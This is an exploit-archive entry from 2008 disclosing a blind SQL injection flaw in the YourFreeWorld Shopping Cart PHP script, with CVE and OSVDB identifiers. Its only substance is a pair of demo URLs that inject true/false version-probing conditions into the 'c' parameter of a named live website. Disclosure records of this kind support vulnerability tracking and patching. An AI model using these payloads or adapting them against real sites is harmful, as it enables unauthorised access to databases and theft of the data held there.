YourFreeWorld Shopping Cart - Blind SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2008-11-01 
date_updated: 2016-12-30 
verified: 1 
codes: OSVDB-49598;CVE-2008-4886;OSVDB-49501 
tags: 
aliases:  
screenshot_url:  
application_url: 

Shopping Cart ( index.php c )  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    :http://www.yourfreeworld.com/script/affiliateshoppingcart.php

Demo :
_______
true & false

http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4
http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5




Greetz : All my freind

Im TrYaGi

# milw0rm.com [2008-11-02]